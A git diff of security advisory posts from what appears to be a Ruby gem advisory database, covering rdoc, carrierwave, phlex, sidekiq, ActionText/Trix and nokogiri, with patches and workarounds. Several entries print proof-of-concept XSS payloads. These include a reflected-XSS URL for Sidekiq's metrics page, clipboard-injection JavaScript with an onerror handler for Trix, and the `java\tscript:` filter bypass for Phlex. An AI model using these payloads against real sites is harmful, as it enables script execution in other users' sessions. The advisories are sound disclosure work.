+    * For Ruby 3.2 users: Update to `rdoc` 6.5.1.1
+
+    You can use `gem update rdoc` to update it. If you are using bundler, please
+    add `gem "rdoc", ">= 6.6.3.1"` to your `Gemfile`.
+
+    Note: 6.3.4, 6.4.1, 6.5.1 and 6.6.3 have a incorrect fix. We recommend to
+    upgrade 6.3.4.1, 6.4.1.1, 6.5.1.1 and 6.6.3.1 instead of them.
+  cvss_v3: 4.5
+  patched_versions:
+  - "~> 6.3.4, >= 6.3.4.1"
+  - "~> 6.4.1, >= 6.4.1.1"
+  - ">=  6.5.1.1"
+---
diff --git a/advisories/_posts/2024-03-25-CVE-2024-29034.md b/advisories/_posts/2024-03-25-CVE-2024-29034.md
index db4f6f5c..192d2c62 100644
--- a/advisories/_posts/2024-03-25-CVE-2024-29034.md
+++ b/advisories/_posts/2024-03-25-CVE-2024-29034.md
@@ -1,74 +1,74 @@
----
-layout: advisory
-title: 'CVE-2024-29034 (carrierwave): CarrierWave content-Type allowlist bypass vulnerability
-  which possibly leads to XSS remained'
-comments: false
-categories:
-- carrierwave
-advisory:
-  gem: carrierwave
-  cve: 2024-29034
-  ghsa: vfmv-jfc5-pjjw
-  url: https://github.com/carrierwaveuploader/carrierwave/security/advisories/GHSA-vfmv-jfc5-pjjw
-  title: CarrierWave content-Type allowlist bypass vulnerability which possibly leads
-    to XSS remained
-  date: 2024-03-25
-  description: |
-    ### Impact
-
-    The vulnerability [CVE-2023-49090](https://github.com/carrierwaveuploader/carrierwave/security/advisories/GHSA-gxhx-g4fq-49hj)
-    wasn't fully addressed.
-
-    This vulnerability is caused by the fact that when uploading to
-    object storage, including Amazon S3, it is possible to set a
-    Content-Type value that is interpreted by browsers to be different
-    from what's allowed by `content_type_allowlist`, by providing
-    multiple values separated by commas.
-
-    This bypassed value can be used to cause XSS.
-
-    ### Patches
-
-    Upgrade to [3.0.7](https://rubygems.org/gems/carrierwave/versions/3.0.7) or [2.2.6](https://rubygems.org/gems/carrierwave/versions/2.2.6).
-
-    ### Workarounds
-    Use the following monkey patch to let CarrierWave parse the
-    Content-type by using `Marcel::MimeType.for`.
-
-    ```ruby
-    # For CarrierWave 3.x
-    CarrierWave::SanitizedFile.class_eval do
-      def declared_content_type
-        @declared_content_type ||
-          if @file.respond_to?(:content_type) && @file.content_type
-            Marcel::MimeType.for(declared_type: @file.content_type.to_s.chomp)
-          end
-      end
-    end
-    ```
-
-    ```ruby
-    # For CarrierWave 2.x
-    CarrierWave::SanitizedFile.class_eval do
-      def existing_content_type
-        if @file.respond_to?(:content_type) && @file.content_type
-          Marcel::MimeType.for(declared_type: @file.content_type.to_s.chomp)
-        end
-      end
-    end
-    ```
-
-    ### References
-
-    [OWASP - File Upload Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html#content-type-validation)
-  cvss_v3: 6.8
-  patched_versions:
-  - "~> 2.2.6"
-  - ">= 3.0.7"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-29034
-    - https://github.com/carrierwaveuploader/carrierwave/security/advisories/GHSA-vfmv-jfc5-pjjw
-    - https://github.com/carrierwaveuploader/carrierwave/commit/25b1c800d45ef8e78dc445ebe3bd8a6e3f0a3477
-    - https://github.com/advisories/GHSA-vfmv-jfc5-pjjw
----
+---
+layout: advisory
+title: 'CVE-2024-29034 (carrierwave): CarrierWave content-Type allowlist bypass vulnerability
+  which possibly leads to XSS remained'
+comments: false
+categories:
+- carrierwave
+advisory:
+  gem: carrierwave
+  cve: 2024-29034
+  ghsa: vfmv-jfc5-pjjw
+  url: https://github.com/carrierwaveuploader/carrierwave/security/advisories/GHSA-vfmv-jfc5-pjjw
+  title: CarrierWave content-Type allowlist bypass vulnerability which possibly leads
+    to XSS remained
+  date: 2024-03-25
+  description: |
+    ### Impact
+
+    The vulnerability [CVE-2023-49090](https://github.com/carrierwaveuploader/carrierwave/security/advisories/GHSA-gxhx-g4fq-49hj)
+    wasn't fully addressed.
+
+    This vulnerability is caused by the fact that when uploading to
+    object storage, including Amazon S3, it is possible to set a
+    Content-Type value that is interpreted by browsers to be different
+    from what's allowed by `content_type_allowlist`, by providing
+    multiple values separated by commas.
+
+    This bypassed value can be used to cause XSS.
+
+    ### Patches
+
+    Upgrade to [3.0.7](https://rubygems.org/gems/carrierwave/versions/3.0.7) or [2.2.6](https://rubygems.org/gems/carrierwave/versions/2.2.6).
+
+    ### Workarounds
+    Use the following monkey patch to let CarrierWave parse the
+    Content-type by using `Marcel::MimeType.for`.
+
+    ```ruby
+    # For CarrierWave 3.x
+    CarrierWave::SanitizedFile.class_eval do
+      def declared_content_type
+        @declared_content_type ||
+          if @file.respond_to?(:content_type) && @file.content_type
+            Marcel::MimeType.for(declared_type: @file.content_type.to_s.chomp)
+          end
+      end
+    end
+    ```
+
+    ```ruby
+    # For CarrierWave 2.x
+    CarrierWave::SanitizedFile.class_eval do
+      def existing_content_type
+        if @file.respond_to?(:content_type) && @file.content_type
+          Marcel::MimeType.for(declared_type: @file.content_type.to_s.chomp)
+        end
+      end
+    end
+    ```
+
+    ### References
+
+    [OWASP - File Upload Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html#content-type-validation)
+  cvss_v3: 6.8
+  patched_versions:
+  - "~> 2.2.6"
+  - ">= 3.0.7"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-29034
+    - https://github.com/carrierwaveuploader/carrierwave/security/advisories/GHSA-vfmv-jfc5-pjjw
+    - https://github.com/carrierwaveuploader/carrierwave/commit/25b1c800d45ef8e78dc445ebe3bd8a6e3f0a3477
+    - https://github.com/advisories/GHSA-vfmv-jfc5-pjjw
+---
diff --git a/advisories/_posts/2024-04-16-CVE-2024-32463.md b/advisories/_posts/2024-04-16-CVE-2024-32463.md
index 8e0b284b..c0345117 100644
--- a/advisories/_posts/2024-04-16-CVE-2024-32463.md
+++ b/advisories/_posts/2024-04-16-CVE-2024-32463.md
@@ -1,63 +1,63 @@
----
-layout: advisory
-title: 'CVE-2024-32463 (phlex): Cross-site Scripting (XSS) possible due to improper
-  sanitisation of `href` attributes on `<a>` tags'
-comments: false
-categories:
-- phlex
-advisory:
-  gem: phlex
-  cve: 2024-32463
-  ghsa: g7xq-xv8c-h98c
-  url: https://github.com/phlex-ruby/phlex/security/advisories/GHSA-g7xq-xv8c-h98c
-  title: Cross-site Scripting (XSS) possible due to improper sanitisation of `href`
-    attributes on `<a>` tags
-  date: 2024-04-16
-  description: |
-    ### Summary
-
-    There is a potential cross-site scripting (XSS) vulnerability that can be exploited via maliciously crafted user data.
-
-    Our filter to detect and prevent the use of the `javascript:` URL scheme in the `href` attribute of an `<a>` tag could be bypassed with tab `\t` or newline `\n` characters between the characters of the protocol, e.g. `java\tscript:`.
-
-    ### Impact
-
-    If you render an `<a>` tag with an `href` attribute set to a user-provided link, that link could potentially execute JavaScript when clicked by another user.
-
-    ```ruby
-    a(href: user_profile) { "Profile" }
-    ```
-
-    ### Mitigation
-
-    The best way to mitigate this vulnerability is to update to one of the following versions:
-
-    - [1.10.1](https://rubygems.org/gems/phlex/versions/1.10.1)
-    - [1.9.2](https://rubygems.org/gems/phlex/versions/1.9.2)
-    - [1.8.3](https://rubygems.org/gems/phlex/versions/1.8.3)
-    - [1.7.2](https://rubygems.org/gems/phlex/versions/1.7.2)
-    - [1.6.3](https://rubygems.org/gems/phlex/versions/1.6.3)
-    - [1.5.3](https://rubygems.org/gems/phlex/versions/1.5.3)
-    - [1.4.2](https://rubygems.org/gems/phlex/versions/1.4.2)
-
-    ### Workarounds
-
-    Configuring a [Content Security Policy](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy) that does not allow [`unsafe-inline`](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy#unsafe-inline) would effectively prevent this vulnerability from being exploited.
-  cvss_v3: 7.1
-  patched_versions:
-  - "~> 1.4.2"
-  - "~> 1.5.3"
-  - "~> 1.6.3"
-  - "~> 1.7.2"
-  - "~> 1.8.3"
-  - "~> 1.9.2"
-  - ">= 1.10.1"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-28199
-    - https://github.com/phlex-ruby/phlex/security/advisories/GHSA-g7xq-xv8c-h98c
-    - https://github.com/phlex-ruby/phlex/commit/9e3f5b980655817993682e409cbda72956d865cb
-    - https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy
-    - https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy#unsafe-inline
-    - https://github.com/advisories/GHSA-g7xq-xv8c-h98c
----
+---
+layout: advisory
+title: 'CVE-2024-32463 (phlex): Cross-site Scripting (XSS) possible due to improper
+  sanitisation of `href` attributes on `<a>` tags'
+comments: false
+categories:
+- phlex
+advisory:
+  gem: phlex
+  cve: 2024-32463
+  ghsa: g7xq-xv8c-h98c
+  url: https://github.com/phlex-ruby/phlex/security/advisories/GHSA-g7xq-xv8c-h98c
+  title: Cross-site Scripting (XSS) possible due to improper sanitisation of `href`
+    attributes on `<a>` tags
+  date: 2024-04-16
+  description: |
+    ### Summary
+
+    There is a potential cross-site scripting (XSS) vulnerability that can be exploited via maliciously crafted user data.
+
+    Our filter to detect and prevent the use of the `javascript:` URL scheme in the `href` attribute of an `<a>` tag could be bypassed with tab `\t` or newline `\n` characters between the characters of the protocol, e.g. `java\tscript:`.
+
+    ### Impact
+
+    If you render an `<a>` tag with an `href` attribute set to a user-provided link, that link could potentially execute JavaScript when clicked by another user.
+
+    ```ruby
+    a(href: user_profile) { "Profile" }
+    ```
+
+    ### Mitigation
+
+    The best way to mitigate this vulnerability is to update to one of the following versions:
+
+    - [1.10.1](https://rubygems.org/gems/phlex/versions/1.10.1)
+    - [1.9.2](https://rubygems.org/gems/phlex/versions/1.9.2)
+    - [1.8.3](https://rubygems.org/gems/phlex/versions/1.8.3)
+    - [1.7.2](https://rubygems.org/gems/phlex/versions/1.7.2)
+    - [1.6.3](https://rubygems.org/gems/phlex/versions/1.6.3)
+    - [1.5.3](https://rubygems.org/gems/phlex/versions/1.5.3)
+    - [1.4.2](https://rubygems.org/gems/phlex/versions/1.4.2)
+
+    ### Workarounds
+
+    Configuring a [Content Security Policy](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy) that does not allow [`unsafe-inline`](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy#unsafe-inline) would effectively prevent this vulnerability from being exploited.
+  cvss_v3: 7.1
+  patched_versions:
+  - "~> 1.4.2"
+  - "~> 1.5.3"
+  - "~> 1.6.3"
+  - "~> 1.7.2"
+  - "~> 1.8.3"
+  - "~> 1.9.2"
+  - ">= 1.10.1"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-28199
+    - https://github.com/phlex-ruby/phlex/security/advisories/GHSA-g7xq-xv8c-h98c
+    - https://github.com/phlex-ruby/phlex/commit/9e3f5b980655817993682e409cbda72956d865cb
+    - https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy
+    - https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy#unsafe-inline
+    - https://github.com/advisories/GHSA-g7xq-xv8c-h98c
+---
diff --git a/advisories/_posts/2024-04-26-CVE-2024-32887.md b/advisories/_posts/2024-04-26-CVE-2024-32887.md
index 43713a94..e31075b8 100644
--- a/advisories/_posts/2024-04-26-CVE-2024-32887.md
+++ b/advisories/_posts/2024-04-26-CVE-2024-32887.md
@@ -1,28 +1,28 @@
----
-layout: advisory
-title: 'CVE-2024-32887 (sidekiq): Reflected XSS in Metrics Web Page'
-comments: false
-categories:
-- sidekiq
-advisory:
-  gem: sidekiq
-  cve: 2024-32887
-  ghsa: GHSA-q655-3pj8-9fxq
-  url: https://github.com/sidekiq/sidekiq/security/advisories/GHSA-q655-3pj8-9fxq
-  title: Reflected XSS in Metrics Web Page
-  date: 2024-04-26
-  description: |
-    Reflected XSS in Sidekiq Web UI via the `/metrics` HTTP end-point and the
-    `substr` query param:
-
-        https://{host}/sidekiq/metrics?substr=foot%22%3E%3Cscript%20src=%22{payload}%22%20/%3E
-  cvss_v3: 5.5
-  unaffected_versions:
-  - "< 7.2.0"
-  patched_versions:
-  - ">= 7.2.4"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-32887
-    - https://github.com/sidekiq/sidekiq/commit/30786e082c70349ab27ffa9eccc42fb0c696164d
----
+---
+layout: advisory
+title: 'CVE-2024-32887 (sidekiq): Reflected XSS in Metrics Web Page'
+comments: false
+categories:
+- sidekiq
+advisory:
+  gem: sidekiq
+  cve: 2024-32887
+  ghsa: GHSA-q655-3pj8-9fxq
+  url: https://github.com/sidekiq/sidekiq/security/advisories/GHSA-q655-3pj8-9fxq
+  title: Reflected XSS in Metrics Web Page
+  date: 2024-04-26
+  description: |
+    Reflected XSS in Sidekiq Web UI via the `/metrics` HTTP end-point and the
+    `substr` query param:
+
+        https://{host}/sidekiq/metrics?substr=foot%22%3E%3Cscript%20src=%22{payload}%22%20/%3E
+  cvss_v3: 5.5
+  unaffected_versions:
+  - "< 7.2.0"
+  patched_versions:
+  - ">= 7.2.4"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-32887
+    - https://github.com/sidekiq/sidekiq/commit/30786e082c70349ab27ffa9eccc42fb0c696164d
+---
diff --git a/advisories/_posts/2024-05-01-CVE-2024-32970.md b/advisories/_posts/2024-05-01-CVE-2024-32970.md
index 3b16d6cc..715a62f0 100644
--- a/advisories/_posts/2024-05-01-CVE-2024-32970.md
+++ b/advisories/_posts/2024-05-01-CVE-2024-32970.md
@@ -1,83 +1,83 @@
----
-layout: advisory
-title: 'CVE-2024-32970 (phlex): Phlex vulnerable to Cross-site Scripting (XSS) via
-  maliciously formed HTML attribute names and values'
-comments: false
-categories:
-- phlex
-advisory:
-  gem: phlex
-  cve: 2024-32970
-  ghsa: 9p57-h987-4vgx
-  url: https://github.com/phlex-ruby/phlex/security/advisories/GHSA-9p57-h987-4vgx
-  title: Phlex vulnerable to Cross-site Scripting (XSS) via maliciously formed HTML
-    attribute names and values
-  date: 2024-05-01
-  description: |
-    There is a potential cross-site scripting (XSS) vulnerability that
-    can be exploited via maliciously crafted user data.
-
-    The reason these issues were not detected before is the escapes were
-    working as designed. However, their design didn't take into account
-    just how recklessly permissive browser are when it comes to executing
-    unsafe JavaScript via HTML attributes.
-
-    ### Impact
-
-    If you render an `<a>` tag with an `href` attribute set to an
-    user-provided link, that link could potentially execute JavaScript
-    when clicked by another user.
-
-    ```ruby
-    a(href: user_profile) { "Profile" }
-    ```
-
-    If you splat user-provided attributes when rendering any HTML or SVG
-    tag, malicious event attributes could be included in the output,
-    executing JavaScript when the events are triggered by another user.
-
-    ```ruby
-    h1(**JSON.parse(user_attributes))
-    ```
-
-    ### Patches
-
-    Patches are [available on RubyGems](https://rubygems.org/gems/phlex)
-    for all minor versions released in the last year.
-
-    - [1.10.2](https://rubygems.org/gems/phlex/versions/1.10.2)
-    - [1.9.3](https://rubygems.org/gems/phlex/versions/1.9.3)
-
-    If you are on `main`, it has been patched since
-    [`da8f943`](https://github.com/phlex-ruby/phlex/commit/da8f94342a84cff9d78c98bcc3b3604ee2e577d2)
-
-    ### Workarounds
-
-    Configuring a [Content Security Policy](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy)
-    that does not allow [`unsafe-inline`](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy#unsafe-inline)
-    would effectively prevent this vulnerability from being exploited.
-
-    ### References
-
-    In addition to upgrading to a patched version of Phlex, we strongly
-    recommend configuring a Content Security Policy header that does
-    not allow `unsafe-inline`. Here’s how you can configure a Content
-    Security Policy header in Rails.
-    https://guides.rubyonrails.org/security.html#content-security-policy-header
-  cvss_v3: 7.1
-  patched_versions:
-  - "~> 1.9.3"
-  - ">= 1.10.2"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-32970
-    - https://github.com/phlex-ruby/phlex/security/advisories/GHSA-9p57-h987-4vgx
-    - https://github.com/phlex-ruby/phlex/commit/da8f94342a84cff9d78c98bcc3b3604ee2e577d2
-    - https://rubygems.org/gems/phlex
-    - https://rubygems.org/gems/phlex/versions/1.10.2
-    - https://rubygems.org/gems/phlex/versions/1.9.3
-    - https://github.com/payloadbox/xss-payload-list
-    - https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy
-    - https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy#unsafe-inline
-    - https://github.com/advisories/GHSA-9p57-h987-4vgx
----
+---
+layout: advisory
+title: 'CVE-2024-32970 (phlex): Phlex vulnerable to Cross-site Scripting (XSS) via
+  maliciously formed HTML attribute names and values'
+comments: false
+categories:
+- phlex
+advisory:
+  gem: phlex
+  cve: 2024-32970
+  ghsa: 9p57-h987-4vgx
+  url: https://github.com/phlex-ruby/phlex/security/advisories/GHSA-9p57-h987-4vgx
+  title: Phlex vulnerable to Cross-site Scripting (XSS) via maliciously formed HTML
+    attribute names and values
+  date: 2024-05-01
+  description: |
+    There is a potential cross-site scripting (XSS) vulnerability that
+    can be exploited via maliciously crafted user data.
+
+    The reason these issues were not detected before is the escapes were
+    working as designed. However, their design didn't take into account
+    just how recklessly permissive browser are when it comes to executing
+    unsafe JavaScript via HTML attributes.
+
+    ### Impact
+
+    If you render an `<a>` tag with an `href` attribute set to an
+    user-provided link, that link could potentially execute JavaScript
+    when clicked by another user.
+
+    ```ruby
+    a(href: user_profile) { "Profile" }
+    ```
+
+    If you splat user-provided attributes when rendering any HTML or SVG
+    tag, malicious event attributes could be included in the output,
+    executing JavaScript when the events are triggered by another user.
+
+    ```ruby
+    h1(**JSON.parse(user_attributes))
+    ```
+
+    ### Patches
+
+    Patches are [available on RubyGems](https://rubygems.org/gems/phlex)
+    for all minor versions released in the last year.
+
+    - [1.10.2](https://rubygems.org/gems/phlex/versions/1.10.2)
+    - [1.9.3](https://rubygems.org/gems/phlex/versions/1.9.3)
+
+    If you are on `main`, it has been patched since
+    [`da8f943`](https://github.com/phlex-ruby/phlex/commit/da8f94342a84cff9d78c98bcc3b3604ee2e577d2)
+
+    ### Workarounds
+
+    Configuring a [Content Security Policy](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy)
+    that does not allow [`unsafe-inline`](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy#unsafe-inline)
+    would effectively prevent this vulnerability from being exploited.
+
+    ### References
+
+    In addition to upgrading to a patched version of Phlex, we strongly
+    recommend configuring a Content Security Policy header that does
+    not allow `unsafe-inline`. Here’s how you can configure a Content
+    Security Policy header in Rails.
+    https://guides.rubyonrails.org/security.html#content-security-policy-header
+  cvss_v3: 7.1
+  patched_versions:
+  - "~> 1.9.3"
+  - ">= 1.10.2"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-32970
+    - https://github.com/phlex-ruby/phlex/security/advisories/GHSA-9p57-h987-4vgx
+    - https://github.com/phlex-ruby/phlex/commit/da8f94342a84cff9d78c98bcc3b3604ee2e577d2
+    - https://rubygems.org/gems/phlex
+    - https://rubygems.org/gems/phlex/versions/1.10.2
+    - https://rubygems.org/gems/phlex/versions/1.9.3
+    - https://github.com/payloadbox/xss-payload-list
+    - https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy
+    - https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy#unsafe-inline
+    - https://github.com/advisories/GHSA-9p57-h987-4vgx
+---
diff --git a/advisories/_posts/2024-05-07-CVE-2024-34341.md b/advisories/_posts/2024-05-07-CVE-2024-34341.md
index 3547b942..2e149629 100644
--- a/advisories/_posts/2024-05-07-CVE-2024-34341.md
+++ b/advisories/_posts/2024-05-07-CVE-2024-34341.md
@@ -1,83 +1,83 @@
----
-layout: advisory
-title: 'CVE-2024-34341 (actiontext): Arbitrary Code Execution Vulnerability in Trix
-  Editor included in ActionText'
-comments: false
-categories:
-- actiontext
-- rails
-advisory:
-  gem: actiontext
-  framework: rails
-  cve: 2024-34341
-  ghsa: qjqp-xr96-cj99
-  url: https://github.com/advisories/GHSA-qjqp-xr96-cj99
-  title: Arbitrary Code Execution Vulnerability in Trix Editor included in ActionText
-  date: 2024-05-07
-  description: |
-    From version 7.0 onwards the ActionText gem includes a copy of the Trix rich text editor.
-    Prior to versions 7.0.8.3 and 7.1.3.3, ActionText included a version of Trix that
-    is vulnerable to arbitrary code execution when
-    copying and pasting content from the web or other documents with markup into the editor.
-    The vulnerability stems from improper sanitization of pasted content, allowing an attacker
-    to embed malicious scripts which are executed within the context of the application.
-
-    # Vulnerable Versions:
-      * 7.1 series older than 7.1.3.3
-      * 7.0 series older than 7.0.8.3
-
-    # Fixed Versions:
-      * 7.1.3.3
-      * 7.0.8.3
-
-    # Vector:
-
-    Bug 1: When copying content manipulated by a script, such as:
-    ```javascript
-    document.addEventListener('copy', function(e){
-      e.clipboardData.setData('text/html', '<div><noscript><div class="123</noscript>456<img src=1 onerror=alert(1)//"></div></noscript></div>');
-      e.preventDefault();
-    });
-    ```
-    and pasting into the Trix editor, the script within the content is executed.
-
-    Bug 2: Similar execution occurs with content structured as:
-
-    ```javascript
-    document.write(`copy<div data-trix-attachment="{&quot;contentType&quot;:&quot;text/html&quot;,&quot;content&quot;:&quot;&lt;img src=1 onerror=alert(101)&gt;HELLO123&quot;}"></div>me`);
-    ```
-
-    # Impact:
-
-    An attacker could exploit these vulnerabilities to execute arbitrary JavaScript code
-    within the context of the user's session, potentially leading to unauthorized actions
-    being performed or sensitive information being disclosed.
-
-    # Remediation:
-
-    Update Recommendation: Users of ActionText 7.0 should upgrade to ActionText version 7.0.8.3 or later.
-    Users of ActionText 7.1 should upgrade to version 7.1.3.3 or later.
-    These updated versions incorporate proper sanitization of input from copied content.
-
-    CSP Enhancement: Additionally, enhancing the Content Security Policy (CSP) to disallow inline scripts
-    can significantly mitigate the risk of such vulnerabilities.
-    Set CSP policies such as script-src 'self' to ensure that only scripts hosted on the same origin
-    are executed, and explicitly prohibit inline scripts using script-src-elem.
-  cvss_v3: 5.4
-  unaffected_versions:
-  - "< 7.0.0"
-  patched_versions:
-  - "~> 7.0.8, >= 7.0.8.3"
-  - ">= 7.1.3.3"
-  related:
-    url:
-    - https://discuss.rubyonrails.org/t/xss-vulnerabilities-in-trix-editor/85803
-    - https://github.com/basecamp/trix/releases/tag/v2.1.1
-    - https://github.com/basecamp/trix/pull/1147
-    - https://github.com/basecamp/trix#1149
-    - https://github.com/basecamp/trix#1153
-    - https://github.com/basecamp/trix/security/advisories/GHSA-qjqp-xr96-cj99
-    - https://github.com/basecamp/trix/commit/1a5c68a14d48421fc368e30026f4a7918028b7ad
-    - https://github.com/basecamp/trix/commit/841ff19b53f349915100bca8fcb488214ff93554
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-34341
----
+---
+layout: advisory
+title: 'CVE-2024-34341 (actiontext): Arbitrary Code Execution Vulnerability in Trix
+  Editor included in ActionText'
+comments: false
+categories:
+- actiontext
+- rails
+advisory:
+  gem: actiontext
+  framework: rails
+  cve: 2024-34341
+  ghsa: qjqp-xr96-cj99
+  url: https://github.com/advisories/GHSA-qjqp-xr96-cj99
+  title: Arbitrary Code Execution Vulnerability in Trix Editor included in ActionText
+  date: 2024-05-07
+  description: |
+    From version 7.0 onwards the ActionText gem includes a copy of the Trix rich text editor.
+    Prior to versions 7.0.8.3 and 7.1.3.3, ActionText included a version of Trix that
+    is vulnerable to arbitrary code execution when
+    copying and pasting content from the web or other documents with markup into the editor.
+    The vulnerability stems from improper sanitization of pasted content, allowing an attacker
+    to embed malicious scripts which are executed within the context of the application.
+
+    # Vulnerable Versions:
+      * 7.1 series older than 7.1.3.3
+      * 7.0 series older than 7.0.8.3
+
+    # Fixed Versions:
+      * 7.1.3.3
+      * 7.0.8.3
+
+    # Vector:
+
+    Bug 1: When copying content manipulated by a script, such as:
+    ```javascript
+    document.addEventListener('copy', function(e){
+      e.clipboardData.setData('text/html', '<div><noscript><div class="123</noscript>456<img src=1 onerror=alert(1)//"></div></noscript></div>');
+      e.preventDefault();
+    });
+    ```
+    and pasting into the Trix editor, the script within the content is executed.
+
+    Bug 2: Similar execution occurs with content structured as:
+
+    ```javascript
+    document.write(`copy<div data-trix-attachment="{&quot;contentType&quot;:&quot;text/html&quot;,&quot;content&quot;:&quot;&lt;img src=1 onerror=alert(101)&gt;HELLO123&quot;}"></div>me`);
+    ```
+
+    # Impact:
+
+    An attacker could exploit these vulnerabilities to execute arbitrary JavaScript code
+    within the context of the user's session, potentially leading to unauthorized actions
+    being performed or sensitive information being disclosed.
+
+    # Remediation:
+
+    Update Recommendation: Users of ActionText 7.0 should upgrade to ActionText version 7.0.8.3 or later.
+    Users of ActionText 7.1 should upgrade to version 7.1.3.3 or later.
+    These updated versions incorporate proper sanitization of input from copied content.
+
+    CSP Enhancement: Additionally, enhancing the Content Security Policy (CSP) to disallow inline scripts
+    can significantly mitigate the risk of such vulnerabilities.
+    Set CSP policies such as script-src 'self' to ensure that only scripts hosted on the same origin
+    are executed, and explicitly prohibit inline scripts using script-src-elem.
+  cvss_v3: 5.4
+  unaffected_versions:
+  - "< 7.0.0"
+  patched_versions:
+  - "~> 7.0.8, >= 7.0.8.3"
+  - ">= 7.1.3.3"
+  related:
+    url:
+    - https://discuss.rubyonrails.org/t/xss-vulnerabilities-in-trix-editor/85803
+    - https://github.com/basecamp/trix/releases/tag/v2.1.1
+    - https://github.com/basecamp/trix/pull/1147
+    - https://github.com/basecamp/trix#1149
+    - https://github.com/basecamp/trix#1153
+    - https://github.com/basecamp/trix/security/advisories/GHSA-qjqp-xr96-cj99
+    - https://github.com/basecamp/trix/commit/1a5c68a14d48421fc368e30026f4a7918028b7ad
+    - https://github.com/basecamp/trix/commit/841ff19b53f349915100bca8fcb488214ff93554
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-34341
+---
diff --git a/advisories/_posts/2024-05-13-GHSA-r95h-9x8f-r3f7.md b/advisories/_posts/2024-05-13-GHSA-r95h-9x8f-r3f7.md
index cb098f52..89141391 100644
--- a/advisories/_posts/2024-05-13-GHSA-r95h-9x8f-r3f7.md
+++ b/advisories/_posts/2024-05-13-GHSA-r95h-9x8f-r3f7.md
@@ -1,46 +1,46 @@
----
-layout: advisory
-title: 'GHSA-r95h-9x8f-r3f7 (nokogiri): Nokogiri updates packaged libxml2 to v2.12.7
-  to resolve CVE-2024-34459'
-comments: false
-categories:
-- nokogiri
-advisory:
-  gem: nokogiri
-  ghsa: r95h-9x8f-r3f7
-  url: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-r95h-9x8f-r3f7
-  title: Nokogiri updates packaged libxml2 to v2.12.7 to resolve CVE-2024-34459
-  date: 2024-05-13
-  description: |
-    ## Summary
-
-    Nokogiri v1.16.5 upgrades its dependency libxml2 to
-    [2.12.7](https://gitlab.gnome.org/GNOME/libxml2/-/releases/v2.12.7) from 2.12.6.
-
-    libxml2 v2.12.7 addresses CVE-2024-34459:
-
-    - described at https://gitlab.gnome.org/GNOME/libxml2/-/issues/720
-    - patched by https://gitlab.gnome.org/GNOME/libxml2/-/commit/2876ac53
-
-    ## Impact
-
-    There is no impact to Nokogiri users because the issue is present only
-    in libxml2's `xmllint` tool which Nokogiri does not provide or expose.
-
-    ## Timeline
-
-    - 2024-05-13 05:57 EDT, libxml2 2.12.7 release is announced
-    - 2024-05-13 08:30 EDT, nokogiri maintainers begin triage
-    - 2024-05-13 10:05 EDT, nokogiri [v1.16.5 is released](https://github.com/sparklemotion/nokogiri/releases/tag/v1.16.5)
-      and this GHSA made public
-  patched_versions:
-  - ">= 1.16.5"
-  related:
-    url:
-    - https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-r95h-9x8f-r3f7
-    - https://github.com/sparklemotion/nokogiri/releases/tag/v1.16.5
-    - https://gitlab.gnome.org/GNOME/libxml2/-/commit/2876ac53
-    - https://gitlab.gnome.org/GNOME/libxml2/-/issues/720
-    - https://github.com/advisories/GHSA-r95h-9x8f-r3f7
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-34459
----
+---
+layout: advisory
+title: 'GHSA-r95h-9x8f-r3f7 (nokogiri): Nokogiri updates packaged libxml2 to v2.12.7
+  to resolve CVE-2024-34459'
+comments: false
+categories:
+- nokogiri
+advisory:
+  gem: nokogiri
+  ghsa: r95h-9x8f-r3f7
+  url: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-r95h-9x8f-r3f7
+  title: Nokogiri updates packaged libxml2 to v2.12.7 to resolve CVE-2024-34459
+  date: 2024-05-13
+  description: |
+    ## Summary
+
+    Nokogiri v1.16.5 upgrades its dependency libxml2 to
+    [2.12.7](https://gitlab.gnome.org/GNOME/libxml2/-/releases/v2.12.7) from 2.12.6.
+
+    libxml2 v2.12.7 addresses CVE-2024-34459:
+
+    - described at https://gitlab.gnome.org/GNOME/libxml2/-/issues/720
+    - patched by https://gitlab.gnome.org/GNOME/libxml2/-/commit/2876ac53
+
+    ## Impact
+
+    There is no impact to Nokogiri users because the issue is present only
+    in libxml2's `xmllint` tool which Nokogiri does not provide or expose.
+
+    ## Timeline
+
+    - 2024-05-13 05:57 EDT, libxml2 2.12.7 release is announced
+    - 2024-05-13 08:30 EDT, nokogiri maintainers begin triage
+    - 2024-05-13 10:05 EDT, nokogiri [v1.16.5 is released](https://github.com/sparklemotion/nokogiri/releases/tag/v1.16.5)
